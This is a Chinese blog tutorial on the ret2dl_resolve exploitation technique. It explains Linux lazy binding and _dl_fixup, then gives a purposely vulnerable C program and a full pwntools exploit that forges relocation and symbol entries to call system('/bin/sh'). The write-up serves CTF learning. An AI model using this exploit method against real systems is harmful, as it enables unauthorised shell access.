<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>Ret2dl_resolve | 白里个白</title>
  <meta name="author" content="SofrWhite">
  
  <meta name="description" content="前言ret2dl_resolve是linux下一种利用linux系统延时绑定(Lazy Binding)机制的一种漏洞利用方法，其主要思想是利用_dl_runtime_resolve()函数写GOT表的操作，改写写入GOT的内容，使其成为getshell的函数值
关键字： pwn ret2dl_resolve ret2_dl_runtime_resolve 延时绑定 栈溢出 ROP">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="Ret2dl_resolve"/>
  <meta property="og:site_name" content="白里个白"/>

  
    <meta property="og:image" content=""/>
  

  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-70812759-1', 'auto');
  ga('send', 'pageview');
</script>



<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?cb5448498d7169c668b07c2b255d62c1";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


<meta name="generator" content="Hexo 4.2.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">白里个白</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> Ret2dl_resolve</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>ret2dl_resolve是linux下一种利用linux系统延时绑定(Lazy Binding)机制的一种漏洞利用方法，其主要思想是利用_dl_runtime_resolve()函数写GOT表的操作，改写写入GOT的内容，使其成为getshell的函数值</p>
<p>关键字： <code>pwn</code> <code>ret2dl_resolve</code> <code>ret2_dl_runtime_resolve</code> <code>延时绑定</code> <code>栈溢出</code> <code>ROP</code></p>
<a id="more"></a>

<h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><p>在了解利用方法之前必须对延时绑定机制详细了解。其具体的方法可以参照《程序员的自我修养——链接、装载与库》一书7.4节。</p>
<p>为了实现少量时间换取大量空间以及方便程序维护的目的，Linux中大量程序抛弃了静态链接的方式，转而投向动态链接 的怀抱。但是由于在程序在运行中不需要动态共享库(.so文件)中的所有函数，所以很多函数自始至终是没有被使用过的。如果一股脑将动态共享库中所有函数都装载进程序的运行空间，这是十分消耗资源的。于是为了节省资源，Linux在程序第一次调用函数时才会将其装载程序。</p>
<p>这里用到了PLT表的结构，细心的小伙伴可能注意过，PLT表中每个函数的第一项都是一个jmp至GOT表的操作。那么这个PLT的作用又是什么呢，为什么不直接使用GOT表呢。在jmp指令下面，还有push和另一个jmp指令，这些指令又是为什么存在在这里呢。</p>
<p>首先看图，此程序是运行在linux下的32位程序，此时的程序的状态是刚刚进入main函数，还未对write函数进行调用：</p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-193621_635x89_scrot.png" alt="2019-07-04-193621_635x89_scrot"></p>
<p>这便是一个程序中PLT表write函数对应表项的内容。此时第一条指令跳转的目的地便是GOT表中write函数对应的表项，查看这个地址中的内容：</p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-194134_429x42_scrot.png" alt="2019-07-04-194134_429x42_scrot"></p>
<p>可以看到，实际上GOT表中在一开始时，并没有存放函数的真实地址，而是原来PLT表write函数对应表项中push 0x20指令的位置，也就是说，当函数第一次调用write函数时，实际上并未直接到底libc中write函数的真正地址，而是绕了一圈回到了PLT表中，将0x20压入栈中，之后跳转至0x8048380处。</p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-194619_514x62_scrot.png" alt="2019-07-04-194619_514x62_scrot"></p>
<p>在这里，程序又将一个参数压栈，然后跳转至0x804a008处，而这个地址中的函数便是_dl_runtime_resolve()函数。</p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-195038_856x477_scrot.png" alt="2019-07-04-195038_856x477_scrot"></p>
<p>而之前压入栈中的两个参数便会作为参数供_dl_runtime_resolve()函数调用：_dl_runtime_resolve(link_map, reloc_arg)，而其中最重要的函数便是_dl_fixup函数，这里的0x20便是reloc_arg，也就是我们在漏洞利用中需要注意控制的内容。</p>
<p>这里0x20的含义是什么呢？这里的0x20偏移是指与.rel.plt表的偏移，readelf -S binary  可以查看ELF文件中段信息。</p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-200224_829x441_scrot.png" alt="2019-07-04-200224_829x441_scrot"></p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-200101_451x43_scrot.png" alt="2019-07-04-200101_451x43_scrot"></p>
<p>这里的0x20的偏移处便是reloc的位置</p>
<p>里面两条信息，一个是write的GOT表，另一个下面分析：</p>
<p>查看下_dl_fixup函数的内容：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">_dl_fixup(struct link_map *l, ElfW(Word) reloc_arg)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 首先通过参数reloc_arg计算重定位入口，这里的JMPREL即.rel.plt，reloc_offset即reloc_arg</span></span><br><span class="line">    <span class="keyword">const</span> PLTREL *<span class="keyword">const</span> reloc = (<span class="keyword">const</span> <span class="keyword">void</span> *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);</span><br><span class="line">    <span class="comment">// 然后通过reloc-&gt;r_info找到.dynsym中对应的条目</span></span><br><span class="line">    <span class="function"><span class="keyword">const</span> <span class="title">ElfW</span><span class="params">(Sym)</span> *sym </span>= &amp;symtab[ELFW(R_SYM) (reloc-&gt;r_info)];</span><br><span class="line">    <span class="comment">// 这里还会检查reloc-&gt;r_info的最低位是不是R_386_JUMP_SLOT=7</span></span><br><span class="line">    assert (ELFW(R_TYPE)(reloc-&gt;r_info) == ELF_MACHINE_JMP_SLOT);</span><br><span class="line">    <span class="comment">// 接着通过strtab+sym-&gt;st_name找到符号表字符串，result为libc基地址</span></span><br><span class="line">    result = _dl_lookup_symbol_x (strtab + sym-&gt;st_name, l, &amp;sym, l-&gt;l_scope, version, ELF_RTYPE_CLASS_PLT, flags, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="comment">// value为libc基址加上要解析函数的偏移地址，也即实际地址</span></span><br><span class="line">    value = DL_FIXUP_MAKE_VALUE (result, sym ? (LOOKUP_VALUE_ADDRESS (result) + sym-&gt;st_value) : <span class="number">0</span>);</span><br><span class="line">    <span class="comment">// 最后把value写入相应的GOT表条目中</span></span><br><span class="line">    <span class="keyword">return</span> elf_machine_fixup_plt (l, result, reloc, rel_addr, value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>函数中遇到了reloc结构体中的r_info，也就是reloc中的0x607，这里低字节的0x07表示R_TYPE，只要是7便好，而高字节的0x6则是R_SYM，是用来找到.dynsym中的条目的。这里的6代表了偏移：</p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-201040_827x270_scrot.png" alt="2019-07-04-201040_827x270_scrot"></p>
<p>这里的write的Num为6，而找到这个地址的方法就是利用.dynsym的地址加上0x10*Num：</p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-201223_766x39_scrot.png" alt="2019-07-04-201223_766x39_scrot"></p>
<p>这里便是write对应的符号信息，此符号信息有结构体的定义</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    Elf32_Word st_name;     <span class="comment">// Symbol name(string tbl index)</span></span><br><span class="line">    Elf32_Addr st_value;    <span class="comment">// Symbol value</span></span><br><span class="line">    Elf32_Word st_size;     <span class="comment">// Symbol size</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> st_info;  <span class="comment">// Symbol type and binding</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> st_other; <span class="comment">// Symbol visibility under glibc&gt;=2.2</span></span><br><span class="line">    Elf32_Section st_shndx; <span class="comment">// Section index</span></span><br><span class="line">&#125; Elf32_Sym;</span><br></pre></td></tr></table></figure>

<p>图中的0x4c便是st_name，而0x12便对应了st_info。那么st_name为什么是个数字呢。实际上，0x4c也是一个偏移，他是相对于.dynstr段的偏移。</p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-202139_357x40_scrot.png" alt="2019-07-04-202139_357x40_scrot"></p>
<p>最后，_dl_fixup函数会利用 <code>result = _dl_lookup_symbol_x (strtab + sym-&gt;st_name, l, &amp;sym, l-&gt;l_scope, version, ELF_RTYPE_CLASS_PLT, flags, NULL);</code>  最终实现调取libc中的write地址：</p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-202513_847x221_scrot.png" alt="2019-07-04-202513_847x221_scrot"></p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-202522_483x41_scrot.png" alt="2019-07-04-202522_483x41_scrot"></p>
<p><img src="/2020/04/01/re2dl_resolve/2019-07-04-202549_662x227_scrot.png" alt="2019-07-04-202549_662x227_scrot"></p>
<p>而ret2dl_resolve就是修改reloc的偏移，构造fake_reloc和fake_Elf32_Sym,使其指向任意的函数。</p>
<h2 id="漏洞利用方法"><a href="#漏洞利用方法" class="headerlink" title="漏洞利用方法"></a>漏洞利用方法</h2><p>现在总结下上述知识和漏洞利用方法。</p>
<p>_dl_runtime_resolve()通过两个参数在libc中寻找函数地址，而我们更加关注的是第二个参数也就是上面write的0x20，0x20将_dl_runtime_resolve()带到了reloc的位置，reloc中有2个重要信息，一个是函数的got表地址，另一个是r_info。r_info的高位是.dynsym中的条目，.dynsym的地址加上0x10*Num，得到函数对应的符号信息，而修改其中的st_name偏移，就可以伪造函数名称，从而实现漏洞利用，我们将其过程反过来，根据漏洞利用顺序，实现漏洞利用：</p>
<p>1、在一个地址上写入”system”；</p>
<p>2、伪造reloc，其中r_info根据.dynsym+0x10*NUM = address of(Elf32_Sym )，计算出r_info；</p>
<p>3、伪造Elf32_Sym ，其中st_name为.dynstr+st_name = address of(“system”)；</p>
<p>4、调用dl_runtime_resolve()的参数，修改其参数，使其指向伪造的reloc。</p>
<h2 id="漏洞利用实例"><a href="#漏洞利用实例" class="headerlink" title="漏洞利用实例"></a>漏洞利用实例</h2><p>首先，先看一个经典的ret2dl_resolve类型题目源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//gcc -m32 -fno-stack-protector -no-pie bof.c -o test</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">vuln</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="keyword">char</span> buf[<span class="number">100</span>];</span><br><span class="line">        setbuf(<span class="built_in">stdin</span>, buf);</span><br><span class="line">        <span class="built_in">read</span>(<span class="number">0</span>, buf, <span class="number">256</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="keyword">char</span> buf[<span class="number">100</span>] = <span class="string">"ret2dl_resolve\n"</span>;</span><br><span class="line">        setbuf(<span class="built_in">stdout</span>, buf);</span><br><span class="line">        vuln();</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这一题目开启了NX，关闭了其他保护，在没有leak函数的情况下，可以通过爆破GOT表上的libc进行漏洞利用，当然，这里就可以利用ret2dl_resolve进行漏洞利用了。根据我们上面的分析，开始构造吧</p>
<h3 id="在一个地址上写入”system”"><a href="#在一个地址上写入”system”" class="headerlink" title="在一个地址上写入”system”"></a>在一个地址上写入”system”</h3><p>由于我们需要一个不变的地址，所以，我们需要在bss段上填写这一数据，所以，我们将栈迁移至bss段上，这里，我们还要考虑后续还要read。</p>
<p>利用栈溢出，ROP，开始迁移栈，常规操作：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">pop_ebp = <span class="number">0x080485bb</span> <span class="comment"># pop ebp ; ret</span></span><br><span class="line">ppp = <span class="number">0x080485b9</span> <span class="comment"># pop esi ; pop edi ; pop ebp ; ret</span></span><br><span class="line">leave = <span class="number">0x08048405</span> <span class="comment"># leave ; ret</span></span><br><span class="line"></span><br><span class="line">bss = <span class="number">0x0804A020</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">"A"</span>*<span class="number">0x70</span></span><br><span class="line">payload += p32(bin.plt[<span class="string">'read'</span>]) + p32(ppp)</span><br><span class="line">payload += p32(<span class="number">0</span>)+p32(bss)+p32(<span class="number">0x100</span>)</span><br><span class="line">payload += p32(pop_ebp)+p32(bss)+p32(leave)</span><br><span class="line"></span><br><span class="line">sl(payload)</span><br></pre></td></tr></table></figure>
<p>迁栈成功，我们再在bss段上写入ROP，并开始下一步工作。</p>
<p><img src="/2020/04/01/re2dl_resolve/image-20200401191805952.png" alt="image-20200401191805952"></p>
<p>因为我们的ROP中有read函数，所以就可以在bss段中写入system。所以，我们接下来将程序流程指向plt表中的最后一条指令，即_dl_runtime_resolve()的GOT表，也就是最后一步，执行_dl_runtime_resolve()。</p>
<p><img src="/2020/04/01/re2dl_resolve/image-20200401193240058.png" alt="image-20200401193240058"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload2 = <span class="string">"AAAA"</span></span><br><span class="line">payload2 += p32(<span class="number">0x804835B</span>) + p32(reloc_arg)</span><br><span class="line">payload2 += (......)</span><br><span class="line">payload2 += <span class="string">'system'</span></span><br></pre></td></tr></table></figure>
<h3 id="伪造reloc"><a href="#伪造reloc" class="headerlink" title="伪造reloc"></a>伪造reloc</h3><p>构建reloc，第一项是read的GOT表，第二项是r_info</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reloc = p32(bin.got[<span class="string">'read'</span>])+p32(r_info)</span><br></pre></td></tr></table></figure>

<p>计算r_info中偏移：</p>
<p><img src="/2020/04/01/re2dl_resolve/image-20200401194913781.png" alt="image-20200401194913781"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">r_info = (((address of (Elf32_Sym) - <span class="number">0x80481cc</span>)/<span class="number">0x10</span>) &lt;&lt; <span class="number">8</span> )+<span class="number">0x7</span></span><br></pre></td></tr></table></figure>

<p>伪造Elf32_Sym：</p>
<p>查看.dynstr位置</p>
<p><img src="/2020/04/01/re2dl_resolve/image-20200401194215835.png" alt="image-20200401194215835"></p>
<p>之后，构造Elf32_Sym</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">r_name = address of (<span class="string">"system"</span>) - <span class="number">0x804824c</span></span><br><span class="line">Elf32_Sym = p32(r_name)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0x12</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)</span><br></pre></td></tr></table></figure>

<h3 id="调用dl-runtime-resolve"><a href="#调用dl-runtime-resolve" class="headerlink" title="调用dl_runtime_resolve()"></a>调用dl_runtime_resolve()</h3><p>总结一下，上述的情况：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">r_name = address of (<span class="string">"system"</span>) - <span class="number">0x804824c</span></span><br><span class="line">Elf32_Sym = p32(r_name)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0x12</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>) </span><br><span class="line"></span><br><span class="line">r_info = (((address of (Elf32_Sym) - <span class="number">0x80481cc</span>)/<span class="number">0x10</span>) &lt;&lt; <span class="number">8</span> )+<span class="number">0x7</span></span><br><span class="line">reloc = p32(bin.got[<span class="string">'read'</span>])+p32(r_info)</span><br><span class="line"></span><br><span class="line">payload2 = p32(<span class="number">0x804835B</span>) + p32(reloc_arg)</span><br><span class="line">payload2 += (......)</span><br><span class="line">payload2 += <span class="string">'system'</span></span><br></pre></td></tr></table></figure>

<p>那么只需要确认上述的几个地址即可，将其安排下去：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">r_name = address of (<span class="string">"system"</span>) - <span class="number">0x804824c</span></span><br><span class="line">Elf32_Sym = p32(r_name)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0x12</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>) </span><br><span class="line"></span><br><span class="line">r_info = (((address of (Elf32_Sym) - <span class="number">0x80481cc</span>)/<span class="number">0x10</span>) &lt;&lt; <span class="number">8</span> )+<span class="number">0x7</span></span><br><span class="line">reloc = p32(bin.got[<span class="string">'read'</span>])+p32(r_info)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">"AAAA"</span></span><br><span class="line">payload2 += p32(<span class="number">0x804835B</span>) + p32(reloc_arg)</span><br><span class="line">payload2 += <span class="string">"AAAA"</span></span><br><span class="line">payload2 += p32(address of <span class="string">"/bin/sh"</span>)</span><br><span class="line">payload2 += reloc</span><br><span class="line">payload2 += Elf32_Sym</span><br><span class="line">payload2 += <span class="string">'system\x00'</span></span><br><span class="line">payload2 += <span class="string">'/bin/sh\x00'</span></span><br></pre></td></tr></table></figure>

<p>那么此时，system的地址为<code>bss+13*4</code>，而Elf32_Sym的地址为<code>bss+8*4</code>,/bin/sh的地址为<code>bss+13*4+7</code></p>
<p>得到：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">r_name = bss+<span class="number">13</span>*<span class="number">4</span> - <span class="number">0x804824c</span></span><br><span class="line">Elf32_Sym = p32(r_name)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0x12</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>) </span><br><span class="line"></span><br><span class="line">r_info = (((bss+<span class="number">8</span>*<span class="number">4</span> - <span class="number">0x80481cc</span>)/<span class="number">0x10</span>) &lt;&lt; <span class="number">8</span> )+<span class="number">0x7</span></span><br><span class="line">reloc = p32(bin.got[<span class="string">'read'</span>])+p32(r_info)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">"AAAA"</span></span><br><span class="line">payload2 += p32(<span class="number">0x804835B</span>) + p32(reloc_arg)</span><br><span class="line">payload2 += <span class="string">"AAAA"</span></span><br><span class="line">payload2 += p32(bss+<span class="number">13</span>*<span class="number">4</span>+<span class="number">7</span>)</span><br><span class="line">payload2 += reloc</span><br><span class="line">payload2 += Elf32_Sym</span><br><span class="line">payload2 += <span class="string">'system\x00'</span></span><br><span class="line">payload2 += <span class="string">'/bin/sh\x00'</span></span><br></pre></td></tr></table></figure>

<p>查看.rel.plt位置</p>
<p><img src="/2020/04/01/re2dl_resolve/image-20200401193504490.png" alt="image-20200401193504490"></p>
<p>所以reloc_arg=bss+5*4 - 0x80482f4</p>
<p>最后，得到全部exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="comment">##########################################################################</span></span><br><span class="line"><span class="comment"># File Name: pwn_exp.py</span></span><br><span class="line"><span class="comment"># Author: sofr</span></span><br><span class="line"><span class="comment"># mail: sofr@foxmail.com</span></span><br><span class="line"><span class="comment"># Created Time: Wed Apr  1 10:24:12 2020</span></span><br><span class="line"><span class="comment">#########################################################################</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">r = <span class="keyword">lambda</span> x:p.recv(x)</span><br><span class="line">ru = <span class="keyword">lambda</span> x:p.recvuntil(x)</span><br><span class="line">s = <span class="keyword">lambda</span> x:p.send(x)</span><br><span class="line">sl = <span class="keyword">lambda</span> x:p.sendline(x)</span><br><span class="line">sf = <span class="keyword">lambda</span> x,y:p.sendafter(x,y)</span><br><span class="line">slf = <span class="keyword">lambda</span> x,y:p.sendlineafter(x,y)</span><br><span class="line">l32_addr = <span class="keyword">lambda</span> x:u32(x.ljust(<span class="number">0x4</span>,<span class="string">'\x00'</span>))</span><br><span class="line">drop_end = <span class="keyword">lambda</span> x,y:x.split(y)[<span class="number">0</span>]</span><br><span class="line">getshell = <span class="keyword">lambda</span> :p.interactive()</span><br><span class="line"></span><br><span class="line">binary=<span class="string">'./boo'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">global</span> p</span><br><span class="line">bin = ELF(binary)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> len(sys.argv) &gt; <span class="number">1</span>:</span><br><span class="line">    p=remote(sys.argv[<span class="number">1</span>],int(sys.argv[<span class="number">2</span>]))</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p=process(binary)</span><br><span class="line"></span><br><span class="line">pop_ebp = <span class="number">0x080485bb</span></span><br><span class="line">ppp = <span class="number">0x080485b9</span></span><br><span class="line">leave = <span class="number">0x08048405</span></span><br><span class="line"></span><br><span class="line">bss = <span class="number">0x0804A020</span>+<span class="number">0x800</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">"A"</span>*<span class="number">0x70</span></span><br><span class="line">payload += p32(bin.plt[<span class="string">'read'</span>]) + p32(ppp)</span><br><span class="line">payload += p32(<span class="number">0</span>)+p32(bss)+p32(<span class="number">0x100</span>)</span><br><span class="line">payload += p32(pop_ebp)+p32(bss)+p32(leave)</span><br><span class="line"></span><br><span class="line">sl(payload)</span><br><span class="line"></span><br><span class="line">reloc_arg=bss+<span class="number">5</span>*<span class="number">4</span> - <span class="number">0x80482f4</span></span><br><span class="line">r_name = bss+<span class="number">13</span>*<span class="number">4</span> - <span class="number">0x804824c</span></span><br><span class="line">Elf32_Sym = p32(r_name)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0x12</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">r_info = (((bss+<span class="number">8</span>*<span class="number">4</span> - <span class="number">0x80481cc</span>)/<span class="number">0x10</span>) &lt;&lt; <span class="number">8</span> )+<span class="number">0x7</span></span><br><span class="line">reloc = p32(bin.got[<span class="string">'read'</span>])+p32(r_info)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(<span class="number">0x804835B</span>) + p32(reloc_arg)</span><br><span class="line">payload2 += <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(bss+<span class="number">13</span>*<span class="number">4</span>+<span class="number">7</span>)</span><br><span class="line">payload2 += reloc</span><br><span class="line">payload2 += Elf32_Sym</span><br><span class="line">payload2 += <span class="string">'system\x00'</span></span><br><span class="line">payload2 += <span class="string">'/bin/sh\x00'</span></span><br><span class="line">sl(payload2)</span><br><span class="line"></span><br><span class="line">getshell()</span><br></pre></td></tr></table></figure>
<p>getshell：</p>
<p><img src="/2020/04/01/re2dl_resolve/image-20200401203502847.png" alt="image-20200401203502847"></p>
<h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h2><p>注意伪造Elf32_Sym的时候，注意0x10对齐的情况，而且，单纯的bss段头无法满足之后函数执行的栈空间需要，所以要加0x800</p>
<h2 id="写在最后"><a href="#写在最后" class="headerlink" title="写在最后"></a>写在最后</h2><p>如有错误欢迎指正：<a href="mailto:sofr@foxmail.com">sofr@foxmail.com</a></p>
